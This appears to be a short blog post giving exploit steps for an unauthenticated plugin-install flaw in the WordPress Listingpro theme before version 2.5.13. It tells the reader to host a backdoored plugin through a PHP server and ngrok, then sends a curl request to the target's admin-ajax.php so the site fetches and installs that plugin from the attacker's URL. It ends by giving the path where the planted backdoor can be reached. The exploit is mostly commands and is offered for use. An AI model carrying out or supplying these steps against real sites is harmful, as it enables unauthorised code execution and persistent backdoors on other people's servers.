Wordpress Listingpro < 2.5.13 Unauthentication Plugins Install

Wordpress Listingpro < 2.5.13 Unauthentication Plugins Install

·

1 min read

Reference: Nintechnet

  1. Download, Wordpress Plugins With Backdoor
  2. Create Directory and move downloaded file to created directory.
  3. Create Server with PHP, and ngrok for public access. PHP:
php -S localhost:8888 -t /path/to/directory

image.png

open another terminal for ngrok. NGROK:

ngrok http 8888

image.png

Make Post request to redacted.

curl http://redacted.com/wp-admin/admin-ajax.php -F "action=lp_cc_addons_actions" -F "ccAction=install" -F "ccDestin=external" -F "ccFileUrl=NGROK_URL/ZIPFILE

image.png

if Success you can access the backdoor in redacted.com/wp-content/plugins/ninja/ninja..